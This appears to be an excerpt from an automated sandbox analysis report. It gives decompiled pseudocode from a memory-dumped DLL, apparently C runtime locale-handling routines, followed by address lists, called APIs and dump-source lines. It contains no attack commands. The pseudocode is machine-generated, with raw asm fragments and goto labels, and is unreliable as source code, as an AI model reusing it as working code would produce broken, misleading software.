						_t474 = _t473 + 0xc;
						if(_t246 != 0) {
							break;
						} else {
							_t8 = _v16 + 0x10; // 0x10
							_t415 = _t8;
							_t342 =  *_v16;
							_v16 = _t415;
							_t416 =  *_t415;
							goto L4;
						}
						while(1) {
							L4:
							_t425 =  *_t342;
							if(_t425 !=  *_t416) {
								break;
							}
							if(_t425 == 0) {
								L8:
								_t343 = 0;
							} else {
								_t425 =  *((intOrPtr*)(_t342 + 2));
								if(_t425 !=  *((intOrPtr*)(_t416 + 2))) {
									break;
								} else {
									_t342 = _t342 + 4;
									_t416 = _t416 + 4;
									if(_t425 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							asm("sbb eax, eax");
							_t373 = _v8 + 0xc;
							_v8 = _t373;
							_v12 = _v12 &  !( ~_t343);
							_t346 = _v16;
							_v16 = _t346;
							_push( *_t346);
							_push(0x6e230f34);
							_push( *_t373);
							E6E20E445(_t360, _t373, _t430, _t446, _t430, 0x351, 3);
							_t473 = _t474 + 0x18;
							if(_v8 < 0x6e230e1c) {
								goto L2;
							} else {
								if(_v12 != 0) {
									E6E20CBD3(_t360);
									_t31 = _t446 + 0x28; // 0x10468b00
									_t437 = _t430 | 0xffffffff;
									__eflags =  *_t31;
									if(__eflags != 0) {
										asm("lock xadd [ecx], eax");
										if(__eflags == 0) {
											_t32 = _t446 + 0x28; // 0x10468b00
											E6E20CBD3( *_t32);
										}
									}
									_t33 = _t446 + 0x24; // 0x3b8e8
									__eflags =  *_t33;
									if( *_t33 != 0) {
										asm("lock xadd [eax], edi");
										__eflags = _t437 == 1;
										if(_t437 == 1) {
											_t34 = _t446 + 0x24; // 0x3b8e8
											E6E20CBD3( *_t34);
										}
									}
									 *(_t446 + 0x24) = 0;
									 *(_t446 + 0x1c) = 0;
									 *(_t446 + 0x28) = 0;
									 *((intOrPtr*)(_t446 + 0x20)) = 0;
									_t39 = _t446 + 0x40; // 0x18914c4
									_t242 =  *_t39;
								} else {
									_t20 = _t446 + 0x28; // 0x10468b00
									_t440 = _t430 | 0xffffffff;
									_t494 =  *_t20;
									if(_t494 != 0) {
										asm("lock xadd [ecx], eax");
										if(_t494 == 0) {
											_t21 = _t446 + 0x28; // 0x10468b00
											E6E20CBD3( *_t21);
										}
									}
									_t22 = _t446 + 0x24; // 0x3b8e8
									if( *_t22 != 0) {
										asm("lock xadd [eax], edi");
										if(_t440 == 1) {
											_t23 = _t446 + 0x24; // 0x3b8e8
											E6E20CBD3( *_t23);
										}
									}
									 *(_t446 + 0x24) =  *(_t446 + 0x24) & 0x00000000;
									_t26 = _t360 + 4; // 0x4
									_t242 = _t26;
									 *(_t446 + 0x1c) =  *(_t446 + 0x1c) & 0x00000000;
									 *(_t446 + 0x28) = _t360;
									 *((intOrPtr*)(_t446 + 0x20)) = _t242;
								}
								goto L20;
							}
							goto L131;
						}
						asm("sbb eax, eax");
						_t343 = _t342 | 0x00000001;
						__eflags = _t343;
						goto L10;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E6E202188();
					asm("int3");
					_push(_t464);
					_t466 = _t474;
					_t475 = _t474 - 0x1d0;
					_t249 =  *0x6e28506c; // 0x3ec3ee36
					_v56 = _t249 ^ _t466;
					_t251 = _v40;
					_push(_t360);
					_push(_t446);
					_t447 = _v36;
					_push(_t430);
					_t431 = _v44;
					_v508 = _t431;
					__eflags = _t251;
					if(_t251 == 0) {
						_v456 = 1;
						_v468 = 0;
						_t362 = 0;
						_v452 = 0;
						__eflags = _t447;
						if(__eflags == 0) {
							L80:
							E6E20E506(_t362, _t373, _t425, _t431, _t447, __eflags, _t431); // executed
							goto L81;
						} else {
							__eflags =  *_t447 - 0x4c;
							if( *_t447 != 0x4c) {
								L59:
								_t257 = E6E20DE92(_t362, _t425, _t431, _t447, _t447,  &_v276, 0x83,  &_v448, 0x55, 0);
								_t477 = _t475 + 0x18;
								__eflags = _t257;
								if(_t257 != 0) {
									_t373 = 0;
									__eflags = 0;
									_t76 = _t431 + 0x20; // 0x6e20da3e
									_t426 = _t76;
									_t449 = 0;
									_v452 = _t426;
									do {
										__eflags = _t449;
										if(_t449 == 0) {
											L74:
											_t258 = _v456;
										} else {
											_t377 =  *_t426;
											_t259 =  &_v276;
											while(1) {
												__eflags =  *_t259 -  *_t377;
												_t431 = _v464;
												if( *_t259 !=  *_t377) {
													break;
												}
												__eflags =  *_t259;
												if( *_t259 == 0) {
													L67:
													_t373 = 0;
													_t260 = 0;
												} else {
													_t427 =  *((intOrPtr*)(_t259 + 2));
													__eflags = _t427 -  *((intOrPtr*)(_t377 + 2));
													_v458 = _t427;
													_t426 = _v452;
													if(_t427 !=  *((intOrPtr*)(_t377 + 2))) {
														break;
													} else {
														_t259 = _t259 + 4;
														_t377 = _t377 + 4;
														__eflags = _v458;
														if(_v458 != 0) {
															continue;
														} else {
															goto L67;
														}
													}
												}
												L69:
												__eflags = _t260;
												if(_t260 == 0) {
													_t362 = _t362 + 1;
													__eflags = _t362;
													goto L74;
												} else {
													_t261 =  &_v276;
													_push(_t261);
													_push(_t449);
													_push(_t431);
													L84();
													_t426 = _v452;
													_t477 = _t477 + 0xc;
													__eflags = _t261;
													if(_t261 == 0) {
														_t373 = 0;
														_t258 = 0;
														_v456 = 0;
													} else {
														_t362 = _t362 + 1;
														_t373 = 0;
														goto L74;
													}
												}
												goto L75;
											}
											asm("sbb eax, eax");
											_t260 = _t259 | 0x00000001;
											_t373 = 0;
											__eflags = 0;
											goto L69;
										}
										L75:
										_t449 = _t449 + 1;
										_t426 = _t426 + 0x10;
										_v452 = _t426;
										__eflags = _t449 - 5;
									} while (_t449 <= 5);
									__eflags = _t258;
									if(__eflags != 0) {
										goto L80;
									} else {
										__eflags = _t362;
										goto L78;
									}
								}
								goto L81;
							} else {
								__eflags =  *(_t447 + 2) - 0x43;
								if( *(_t447 + 2) != 0x43) {
									goto L59;
								} else {
									__eflags =  *((short*)(_t447 + 4)) - 0x5f;
									if( *((short*)(_t447 + 4)) != 0x5f) {
										goto L59;
									} else {
										while(1) {
											_t263 = E6E21D60D(_t447, 0x6e230f28);
											_t364 = _t263;
											_v472 = _t364;
											_pop(_t379);
											__eflags = _t364;
											if(_t364 == 0) {
												break;
											}
											_t265 = _t263 - _t447;
											__eflags = _t265;
											_v456 = _t265 >> 1;
											if(_t265 == 0) {
												break;
											} else {
												_t267 = 0x3b;
												__eflags =  *_t364 - _t267;
												if( *_t364 == _t267) {
													break;
												} else {
													_t434 = _v456;
													_t365 = 0x6e230dec;
													_v460 = 1;
													do {
														_t268 = E6E20ABBA( *_t365, _t447, _t434);
														_t475 = _t475 + 0xc;
														__eflags = _t268;
														if(_t268 != 0) {
															goto L46;
														} else {
															_t380 =  *_t365;
															_t425 = _t380 + 2;
															do {
																_t337 =  *_t380;
																_t380 = _t380 + 2;
																__eflags = _t337 - _v468;
															} while (_t337 != _v468);
															_t379 = _t380 - _t425 >> 1;
															__eflags = _t434 - _t380 - _t425 >> 1;
															if(_t434 != _t380 - _t425 >> 1) {
																goto L46;
															}
														}
														break;
														L46:
														_v460 = _v460 + 1;
														_t365 = _t365 + 0xc;
														__eflags = _t365 - 0x6e230e1c;
													} while (_t365 <= 0x6e230e1c);
													_t362 = _v472 + 2;
													_t269 = E6E21D5BD(_t379, _t362, 0x6e230f30);
													_t431 = _v464;
													_t450 = _t269;
													_pop(_t383);
													__eflags = _t450;
													if(_t450 != 0) {
														L49:
														__eflags = _v460 - 5;
														if(_v460 > 5) {
															_t270 = _v452;
															goto L55;
														} else {
															_push(_t450);
															_t272 = E6E21D5B2(_t383,  &_v276, 0x83, _t362);
															_t478 = _t475 + 0x10;
															__eflags = _t272;
															if(_t272 != 0) {
																L83:
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																E6E202188();
																asm("int3");
																_push(_t466);
																_t468 = _t478;
																_t275 =  *0x6e28506c; // 0x3ec3ee36
																_v556 = _t275 ^ _t468;
																_push(_t362);
																_t367 = _v540;
																_push(_t450);
																_push(_t431);
																_t435 = _v544;
																_v1292 = _t367;
																_v1276 = E6E20D5FF(_t367, _t383, _t425) + 0x278;
																_t282 = E6E20DE92(_t367, _t425, _t435, _v536, _v536,  &_v820, 0x83,  &_v1248, 0x55,  &_v1256);
																_t480 = _t478 - 0x2e4 + 0x18;
																__eflags = _t282;
																if(_t282 != 0) {
																	_t101 = _t367 + 2; // 0x6
																	_t453 = _t101 << 4;
																	__eflags = _t453;
																	_t283 =  &_v280;
																	_v724 = _t453;
																	_t428 =  *(_t453 + _t435);
																	_t384 =  *(_t453 + _t435);
																	while(1) {
																		_v712 = _v712 & 0x00000000;
																		__eflags =  *_t283 -  *_t384;
																		_t455 = _v724;
																		if( *_t283 !=  *_t384) {
																			break;
																		}
																		__eflags =  *_t283;
																		if( *_t283 == 0) {
																			L93:
																			_t284 = _v712;
																		} else {
																			_t462 =  *((intOrPtr*)(_t283 + 2));
																			__eflags = _t462 -  *((intOrPtr*)(_t384 + 2));
																			_v718 = _t462;
																			_t455 = _v724;
																			if(_t462 !=  *((intOrPtr*)(_t384 + 2))) {
																				break;
																			} else {
																				_t283 = _t283 + 4;
																				_t384 = _t384 + 4;
																				__eflags = _v718;
																				if(_v718 != 0) {
																					continue;
																				} else {
																					goto L93;
																				}
																			}
																		}
																		L95:
																		__eflags = _t284;
																		if(_t284 != 0) {
																			_t385 =  &_v280;
																			_t428 = _t385 + 2;
																			do {
																				_t285 =  *_t385;
																				_t385 = _t385 + 2;
																				__eflags = _t285 - _v712;
																			} while (_t285 != _v712);
																			_v728 = (_t385 - _t428 >> 1) + 1;
																			_t288 = E6E20F26D(_t385 - _t428 >> 1, 4 + ((_t385 - _t428 >> 1) + 1) * 2);
																			_v740 = _t288;
																			__eflags = _t288;
																			if(_t288 == 0) {
																				goto L86;
																			} else {
																				_v732 =  *((intOrPtr*)(_t455 + _t435));
																				_t125 = _t367 * 4; // 0xe764e850
																				_v744 =  *((intOrPtr*)(_t435 + _t125 + 0xa0));
																				_t128 = _t435 + 8; // 0x8b018b
																				_v748 =  *_t128;
																				_t394 =  &_v280;
																				_v720 = _t288 + 4;
																				_t292 = E6E2091A7(_t288 + 4, _v728,  &_v280);
																				_t482 = _t480 + 0xc;
																				__eflags = _t292;
																				if(_t292 != 0) {
																					_t293 = _v712;
																					_push(_t293);
																					_push(_t293);
																					_push(_t293);
																					_push(_t293);
																					_push(_t293);
																					E6E202188();
																					asm("int3");
																					_t295 =  *0x6e2876f0; // 0xe56430
																					 *0x6e285108 =  *((intOrPtr*)(_t295 + 0x88));
																					 *0x6e2851c0 =  *_t295;
																					_t296 =  *((intOrPtr*)(_t295 + 4));
																					 *0x6e2851ec = _t296;
																					return _t296;
																				} else {
																					__eflags = _v280 - 0x43;
																					 *((intOrPtr*)(_t455 + _t435)) = _v720;
																					if(_v280 != 0x43) {
																						L104:
																						_t299 = E6E20DB3B(_t367, _t394, _t435,  &_v708);
																						_t398 = _v712;
																						 *(_t435 + 0xa0 + _t367 * 4) = _t299;
																					} else {
																						__eflags = _v278;
																						if(_v278 != 0) {
																							goto L104;
																						} else {
																							_t398 = _v712;
																							 *(_t435 + 0xa0 + _t367 * 4) = _t398;
																						}
																					}
																					__eflags = _t367 - 2;
																					if(_t367 != 2) {
																						__eflags = _t367 - 1;
																						if(_t367 != 1) {
																							__eflags = _t367 - 5;
																							if(_t367 == 5) {
																								 *((intOrPtr*)(_t435 + 0x14)) = _v716;
																							}
																						} else {
																							 *((intOrPtr*)(_t435 + 0x10)) = _v716;
																						}
																					} else {
																						_t460 = _v736;
																						_t428 = _t398;
																						_t408 = _t460;
																						 *(_t435 + 8) = _v716;
																						_v720 = _t460;
																						_v728 = _t460[8];
																						_v716 = _t460[9];
																						while(1) {
																							_t154 = _t435 + 8; // 0x8b018b
																							__eflags =  *_t154 -  *_t408;
																							if( *_t154 ==  *_t408) {
																								break;
																							}
																							_t461 = _v720;
																							_t428 = _t428 + 1;
																							_t331 =  *_t408;
																							 *_t461 = _v728;
																							_v716 = _t408[1];
																							_t408 = _t461 + 8;
																							 *((intOrPtr*)(_t461 + 4)) = _v716;
																							_t367 = _v752;
																							_t460 = _v736;
																							_v728 = _t331;
																							_v720 = _t408;
																							__eflags = _t428 - 5;
																							if(_t428 < 5) {
																								continue;
																							} else {
																							}
																							L112:
																							__eflags = _t428 - 5;
																							if(__eflags == 0) {
																								_t178 = _t435 + 8; // 0x8b018b
																								_t322 = E6E216102(_t367, _t428, _t435, __eflags, _v712, 1, 0x6e230ea8, 0x7f,  &_v536,  *_t178, 1);
																								_t482 = _t482 + 0x1c;
																								__eflags = _t322;
																								_t323 = _v712;
																								if(_t322 == 0) {
																									_t460[1] = _t323;
																								} else {
																									do {
																										 *(_t468 + _t323 * 2 - 0x20c) =  *(_t468 + _t323 * 2 - 0x20c) & 0x000001ff;
																										_t323 = _t323 + 1;
																										__eflags = _t323 - 0x7f;
																									} while (_t323 < 0x7f);
																									_t326 = E6E1E1C3C( &_v536,  *0x6e2851e8, 0xfe);
																									_t482 = _t482 + 0xc;
																									__eflags = _t326;
																									_t460[1] = 0 | _t326 == 0x00000000;
																								}
																								_t193 = _t435 + 8; // 0x8b018b
																								 *_t460 =  *_t193;
																							}
																							 *(_t435 + 0x18) = _t460[1];
																							goto L123;
																						}
																						__eflags = _t428;
																						if(_t428 != 0) {
																							 *_t460 =  *(_t460 + _t428 * 8);
																							_t460[1] =  *(_t460 + 4 + _t428 * 8);
																							 *(_t460 + _t428 * 8) = _v728;
																							 *(_t460 + 4 + _t428 * 8) = _v716;
																						}
																						goto L112;
																					}
																					L123:
																					_t300 = _t367 * 0xc;
																					_t200 = _t300 + 0x6e230de8; // 0x6e1c815c
																					 *0x6e22a26c(_t435);
																					_t302 =  *((intOrPtr*)( *_t200))();
																					_t401 = _v732;
																					__eflags = _t302;
																					if(_t302 == 0) {
																						__eflags = _t401 - 0x6e2852b0;
																						if(_t401 != 0x6e2852b0) {
																							_t459 = _t367 + _t367;
																							__eflags = _t459;
																							asm("lock xadd [eax], ecx");
																							if(_t459 != 0) {
																								goto L128;
																							} else {
																								_t218 = _t459 * 8; // 0x10468b00
																								E6E20CBD3( *((intOrPtr*)(_t435 + _t218 + 0x28)));
																								_t221 = _t459 * 8; // 0x3b8e8
																								E6E20CBD3( *((intOrPtr*)(_t435 + _t221 + 0x24)));
																								_t224 = _t367 * 4; // 0xe764e850
																								E6E20CBD3( *((intOrPtr*)(_t435 + _t224 + 0xa0)));
																								_t404 = _v712;
																								 *((intOrPtr*)(_v724 + _t435)) = _t404;
																								 *(_t435 + 0xa0 + _t367 * 4) = _t404;
																							}
																						}
																						_t402 = _v740;
																						 *_t402 = 1;
																						 *((intOrPtr*)(_t435 + 0x28 + (_t367 + _t367) * 8)) = _t402;
																					} else {
																						 *(_v724 + _t435) = _t401;
																						_t205 = _t367 * 4; // 0xe764e850
																						E6E20CBD3( *((intOrPtr*)(_t435 + _t205 + 0xa0)));
																						 *(_t435 + 0xa0 + _t367 * 4) = _v744;
																						E6E20CBD3(_v740);
																						 *(_t435 + 8) = _v748;
																						goto L86;
																					}
																					goto L87;
																				}
																			}
																		} else {
																			goto L87;
																		}
																		goto L131;
																	}
																	asm("sbb eax, eax");
																	_t284 = _t283 | 0x00000001;
																	__eflags = _t284;
																	goto L95;
																} else {
																	L86:
																	__eflags = 0;
																	L87:
																	_pop(_t456);
																	__eflags = _v16 ^ _t468;
																	return E6E1DF8A5(_v16 ^ _t468, _t428, _t456);
																}
															} else {
																_t333 = _t450 + _t450;
																__eflags = _t333 - 0x106;
																if(_t333 >= 0x106) {
																	E6E1E03A9();
																	goto L83;
																} else {
																	 *((short*)(_t466 + _t333 - 0x10c)) = 0;
																	_t335 =  &_v276;
																	_push(_t335);
																	_push(_v460);
																	_push(_t431);
																	L84();
																	_t475 = _t478 + 0xc;
																	__eflags = _t335;
																	_t270 = _v452;
																	if(_t335 != 0) {
																		_t270 = _t270 + 1;
																		_v452 = _t270;
																	}
																	L55:
																	_t447 = _t362 + _t450 * 2;
																	_t373 = 0;
																	__eflags =  *_t447;
																	if( *_t447 == 0) {
																		L57:
																		__eflags = _t270;
																		L78:
																		if(__eflags != 0) {
																			goto L80;
																		} else {
																		}
																		goto L81;
																	} else {
																		_t447 = _t447 + 2;
																		__eflags =  *_t447;
																		if( *_t447 != 0) {
																			continue;
																		} else {
																			goto L57;
																		}
																	}
																}
															}
														}
													} else {
														_t336 = 0x3b;
														__eflags =  *_t362 - _t336;
														if( *_t362 != _t336) {
															break;
														} else {
															goto L49;
														}
													}
												}
											}
											goto L131;
										}
										goto L81;
									}
								}
							}
						}
					} else {
						__eflags = _t447;
						if(_t447 != 0) {
							_push(_t447);
							_push(_t251);
							_push(_t431);
							L84();
						}
						L81:
						_pop(_t448);
						__eflags = _v12 ^ _t466;
						return E6E1DF8A5(_v12 ^ _t466, _t425, _t448);
					}
				}
				L131:
			}

0x6e20e506
0x6e20e509
0x6e20e50b
0x6e20e50e
0x6e20e50f
0x6e20e518
0x6e20e51b
0x6e20e520
0x6e20e522
0x6e20e524
0x6e20e527
0x6e20e640
0x6e20e645
0x6e20e52d
0x6e20e52d
0x6e20e52e
0x6e20e52e
0x6e20e531
0x6e20e534
0x6e20e536
0x6e20e539
0x6e20e539
0x6e20e53c
0x6e20e53e
0x6e20e541
0x6e20e546
0x6e20e554
0x6e20e55e
0x6e20e561
0x6e20e564
0x6e20e564
0x6e20e56f
0x6e20e574
0x6e20e579
0x00000000
0x6e20e57f
0x6e20e582
0x6e20e582
0x6e20e585
0x6e20e587
0x6e20e58a
0x6e20e58a
0x6e20e58a
0x6e20e58c
0x6e20e58c
0x6e20e58c
0x6e20e592
0x00000000
0x00000000
0x6e20e597
0x6e20e5ae
0x6e20e5ae
0x6e20e599
0x6e20e599
0x6e20e5a1
0x00000000
0x6e20e5a3
0x6e20e5a3
0x6e20e5a6
0x6e20e5ac
0x00000000
0x00000000
0x00000000
0x00000000
0x6e20e5ac
0x6e20e5a1
0x6e20e5b7
0x6e20e5bc
0x6e20e5be
0x6e20e5c3
0x6e20e5c6
0x6e20e5c9
0x6e20e5cc
0x6e20e5cf
0x6e20e5d1
0x6e20e5d6
0x6e20e5e0
0x6e20e5e8
0x6e20e5f0
0x00000000
0x6e20e5f6
0x6e20e5fa
0x6e20e647
0x6e20e64d
0x6e20e650
0x6e20e653
0x6e20e655
0x6e20e659
0x6e20e65d
0x6e20e65f
0x6e20e662
0x6e20e667
0x6e20e65d
0x6e20e668
0x6e20e66b
0x6e20e66d
0x6e20e66f
0x6e20e673
0x6e20e674
0x6e20e676
0x6e20e679
0x6e20e67e
0x6e20e674
0x6e20e681
0x6e20e684
0x6e20e687
0x6e20e68a
0x6e20e68d
0x6e20e68d
0x6e20e5fc
0x6e20e5fc
0x6e20e5ff
0x6e20e602
0x6e20e604
0x6e20e608
0x6e20e60c
0x6e20e60e
0x6e20e611
0x6e20e616
0x6e20e60c
0x6e20e617
0x6e20e61c
0x6e20e61e
0x6e20e623
0x6e20e625
0x6e20e628
0x6e20e62d
0x6e20e623
0x6e20e62e
0x6e20e632
0x6e20e632
0x6e20e635
0x6e20e639
0x6e20e63c
0x6e20e63c
0x00000000
0x6e20e63f
0x00000000
0x6e20e5f0
0x6e20e5b2
0x6e20e5b4
0x6e20e5b4
0x00000000
0x6e20e5b4
0x6e20e694
0x6e20e695
0x6e20e696
0x6e20e697
0x6e20e698
0x6e20e699
0x6e20e69e
0x6e20e6a1
0x6e20e6a2
0x6e20e6a4
0x6e20e6aa
0x6e20e6b1
0x6e20e6b4
0x6e20e6b7
0x6e20e6b8
0x6e20e6b9
0x6e20e6bc
0x6e20e6bd
0x6e20e6c0
0x6e20e6c6
0x6e20e6c8
0x6e20e6ed
0x6e20e6f7
0x6e20e6fd
0x6e20e6ff
0x6e20e705
0x6e20e707
0x6e20e95a
0x6e20e95b
0x00000000
0x6e20e70d
0x6e20e70d
0x6e20e711
0x6e20e878
0x6e20e88f
0x6e20e894
0x6e20e897
0x6e20e899
0x6e20e89f
0x6e20e89f
0x6e20e8a1
0x6e20e8a1
0x6e20e8a4
0x6e20e8a6
0x6e20e8ac
0x6e20e8ac
0x6e20e8ae
0x6e20e935
0x6e20e935
0x6e20e8b4
0x6e20e8b4
0x6e20e8b6
0x6e20e8bc
0x6e20e8bf
0x6e20e8c2
0x6e20e8c8
0x00000000
0x00000000
0x6e20e8ca
0x6e20e8ce
0x6e20e8f7
0x6e20e8f7
0x6e20e8f9
0x6e20e8d0
0x6e20e8d0
0x6e20e8d4
0x6e20e8d8
0x6e20e8df
0x6e20e8e5
0x00000000
0x6e20e8e7
0x6e20e8e7
0x6e20e8ea
0x6e20e8ed
0x6e20e8f5
0x00000000
0x00000000
0x00000000
0x00000000
0x6e20e8f5
0x6e20e8e5
0x6e20e904
0x6e20e904
0x6e20e906
0x6e20e934
0x6e20e934
0x00000000
0x6e20e908
0x6e20e908
0x6e20e90e
0x6e20e90f
0x6e20e910
0x6e20e911
0x6e20e916
0x6e20e91c
0x6e20e91f
0x6e20e921
0x6e20e928
0x6e20e92a
0x6e20e92c
0x6e20e923
0x6e20e923
0x6e20e924
0x00000000
0x6e20e924
0x6e20e921
0x00000000
0x6e20e906
0x6e20e8fd
0x6e20e8ff
0x6e20e902
0x6e20e902
0x00000000
0x6e20e902
0x6e20e93b
0x6e20e93b
0x6e20e93c
0x6e20e93f
0x6e20e945
0x6e20e945
0x6e20e94e
0x6e20e950
0x00000000
0x6e20e952
0x6e20e952
0x00000000
0x6e20e952
0x6e20e950
0x00000000
0x6e20e717
0x6e20e717
0x6e20e71c
0x00000000
0x6e20e722
0x6e20e722
0x6e20e727
0x00000000
0x6e20e72d
0x6e20e72d
0x6e20e733
0x6e20e738
0x6e20e73a
0x6e20e741
0x6e20e742
0x6e20e744
0x00000000
0x00000000
0x6e20e74a
0x6e20e74a
0x6e20e74e
0x6e20e754
0x00000000
0x6e20e75a
0x6e20e75c
0x6e20e75d
0x6e20e760
0x00000000
0x6e20e766
0x6e20e766
0x6e20e76c
0x6e20e771
0x6e20e77b
0x6e20e77f
0x6e20e784
0x6e20e787
0x6e20e789
0x00000000
0x6e20e78b
0x6e20e78b
0x6e20e78d
0x6e20e790
0x6e20e790
0x6e20e793
0x6e20e796
0x6e20e796
0x6e20e7a1
0x6e20e7a3
0x6e20e7a5
0x00000000
0x00000000
0x6e20e7a5
0x00000000
0x6e20e7a7
0x6e20e7a7
0x6e20e7ad
0x6e20e7b0
0x6e20e7b0
0x6e20e7be
0x6e20e7c7
0x6e20e7cc
0x6e20e7d2
0x6e20e7d5
0x6e20e7d6
0x6e20e7d8
0x6e20e7e6
0x6e20e7e6
0x6e20e7ed
0x6e20e84e
0x00000000
0x6e20e7ef
0x6e20e7ef
0x6e20e7fd
0x6e20e802
0x6e20e805
0x6e20e807
0x6e20e977
0x6e20e979
0x6e20e97a
0x6e20e97b
0x6e20e97c
0x6e20e97d
0x6e20e97e
0x6e20e983
0x6e20e986
0x6e20e987
0x6e20e98f
0x6e20e996
0x6e20e999
0x6e20e99a
0x6e20e99d
0x6e20e9a1
0x6e20e9a2
0x6e20e9a5
0x6e20e9b5
0x6e20e9d8
0x6e20e9dd
0x6e20e9e0
0x6e20e9e2
0x6e20e9f7
0x6e20e9fa
0x6e20e9fa
0x6e20e9fd
0x6e20ea03
0x6e20ea09
0x6e20ea0c
0x6e20ea0e
0x6e20ea11
0x6e20ea18
0x6e20ea1b
0x6e20ea21
0x00000000
0x00000000
0x6e20ea23
0x6e20ea27
0x6e20ea50
0x6e20ea50
0x6e20ea29
0x6e20ea29
0x6e20ea2d
0x6e20ea31
0x6e20ea38
0x6e20ea3e
0x00000000
0x6e20ea40
0x6e20ea40
0x6e20ea43
0x6e20ea46
0x6e20ea4e
0x00000000
0x00000000
0x00000000
0x00000000
0x6e20ea4e
0x6e20ea3e
0x6e20ea5d
0x6e20ea5d
0x6e20ea5f
0x6e20ea65
0x6e20ea6b
0x6e20ea6e
0x6e20ea6e
0x6e20ea71
0x6e20ea74
0x6e20ea74
0x6e20ea84
0x6e20ea92
0x6e20ea97
0x6e20ea9e
0x6e20eaa0
0x00000000
0x6e20eaa6
0x6e20eaac
0x6e20eab2
0x6e20eab9
0x6e20eabf
0x6e20eac2
0x6e20eac8
0x6e20ead5
0x6e20eadc
0x6e20eae1
0x6e20eae4
0x6e20eae6
0x6e20ed3f
0x6e20ed45
0x6e20ed46
0x6e20ed47
0x6e20ed48
0x6e20ed49
0x6e20ed4a
0x6e20ed4f
0x6e20ed50
0x6e20ed5b
0x6e20ed63
0x6e20ed69
0x6e20ed6c
0x6e20ed71
0x6e20eaec
0x6e20eaec
0x6e20eafa
0x6e20eafd
0x6e20eb18
0x6e20eb1f
0x6e20eb25
0x6e20eb2b
0x6e20eaff
0x6e20eaff
0x6e20eb07
0x00000000
0x6e20eb09
0x6e20eb09
0x6e20eb0f
0x6e20eb0f
0x6e20eb07
0x6e20eb32
0x6e20eb35
0x6e20ec52
0x6e20ec55
0x6e20ec62
0x6e20ec65
0x6e20ec6d
0x6e20ec6d
0x6e20ec57
0x6e20ec5d
0x6e20ec5d
0x6e20eb3b
0x6e20eb3b
0x6e20eb41
0x6e20eb49
0x6e20eb4b
0x6e20eb4e
0x6e20eb57
0x6e20eb60
0x6e20eb66
0x6e20eb66
0x6e20eb69
0x6e20eb6b
0x00000000
0x00000000
0x6e20eb6d
0x6e20eb73
0x6e20eb74
0x6e20eb7f
0x6e20eb87
0x6e20eb8f
0x6e20eb92
0x6e20eb95
0x6e20eb9b
0x6e20eba1
0x6e20eba7
0x6e20ebad
0x6e20ebb0
0x00000000
0x00000000
0x6e20ebb2
0x6e20ebd7
0x6e20ebd7
0x6e20ebda
0x6e20ebde
0x6e20ebf7
0x6e20ebfc
0x6e20ebff
0x6e20ec01
0x6e20ec07
0x6e20ec42
0x6e20ec09
0x6e20ec09
0x6e20ec0e
0x6e20ec16
0x6e20ec17
0x6e20ec17
0x6e20ec2e
0x6e20ec35
0x6e20ec38
0x6e20ec3d
0x6e20ec3d
0x6e20ec45
0x6e20ec48
0x6e20ec48
0x6e20ec4d
0x00000000
0x6e20ec4d
0x6e20ebb4
0x6e20ebb6
0x6e20ebbb
0x6e20ebc1
0x6e20ebca
0x6e20ebd3
0x6e20ebd3
0x00000000
0x6e20ebb6
0x6e20ec70
0x6e20ec70
0x6e20ec74
0x6e20ec7c
0x6e20ec82
0x6e20ec85
0x6e20ec8b
0x6e20ec8d
0x6e20eccd
0x6e20ecd3
0x6e20ecda
0x6e20ecda
0x6e20ece0
0x6e20ece4
0x00000000
0x6e20ece6
0x6e20ece6
0x6e20ecea
0x6e20ecef
0x6e20ecf3
0x6e20ecf8
0x6e20ecff
0x6e20ed0d
0x6e20ed13
0x6e20ed16
0x6e20ed16
0x6e20ece4
0x6e20ed25
0x6e20ed2d
0x6e20ed36
0x6e20ec8f
0x6e20ec95
0x6e20ec98
0x6e20ec9f
0x6e20ecb1
0x6e20ecb8
0x6e20ecc5
0x00000000
0x6e20ecc5
0x00000000
0x6e20ec8d
0x6e20eae6
0x6e20ea61
0x00000000
0x6e20ea61
0x00000000
0x6e20ea5f
0x6e20ea58
0x6e20ea5a
0x6e20ea5a
0x00000000
0x6e20e9e4
0x6e20e9e4
0x6e20e9e4
0x6e20e9e6
0x6e20e9ea
0x6e20e9eb
0x6e20e9f6
0x6e20e9f6
0x6e20e80d
0x6e20e80d
0x6e20e810
0x6e20e815
0x6e20e972
0x00000000
0x6e20e81b
0x6e20e81d
0x6e20e825
0x6e20e82b
0x6e20e82c
0x6e20e832
0x6e20e833
0x6e20e838
0x6e20e83b
0x6e20e83d
0x6e20e843
0x6e20e845
0x6e20e846
0x6e20e846
0x6e20e854
0x6e20e854
0x6e20e857
0x6e20e859
0x6e20e85c
0x6e20e86a
0x6e20e86a
0x6e20e954
0x6e20e954
0x00000000
0x6e20e956
0x6e20e956
0x00000000
0x6e20e85e
0x6e20e85e
0x6e20e861
0x6e20e864
0x00000000
0x00000000
0x00000000
0x00000000
0x6e20e864
0x6e20e85c
0x6e20e815
0x6e20e807
0x6e20e7da
0x6e20e7dc
0x6e20e7dd
0x6e20e7e0
0x00000000
0x00000000
0x00000000
0x00000000
0x6e20e7e0
0x6e20e7d8
0x6e20e760
0x00000000
0x6e20e754
0x00000000
0x6e20e871
0x6e20e727
0x6e20e71c
0x6e20e711
0x6e20e6ca
0x6e20e6ca
0x6e20e6cc
0x6e20e6ce
0x6e20e6cf
0x6e20e6d0
0x6e20e6d1
0x6e20e6d6
0x6e20e961
0x6e20e965
0x6e20e966
0x6e20e971
0x6e20e971
0x6e20e6c8
0x00000000

APIs

Part of subcall function 6E20F26D: RtlAllocateHeap.NTDLL(00000000,6E1C75D9,00000000,?,6E1E0F8B,00000002,00000000,?,?,?,6E1A1298,6E1C75D9,00000004,00000000,00000000,00000000), ref: 6E20F29F

_free.LIBCMT ref: 6E20E611
_free.LIBCMT ref: 6E20E628
_free.LIBCMT ref: 6E20E647
_free.LIBCMT ref: 6E20E662
_free.LIBCMT ref: 6E20E679

Strings

#n, xrefs: 6E20E559

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
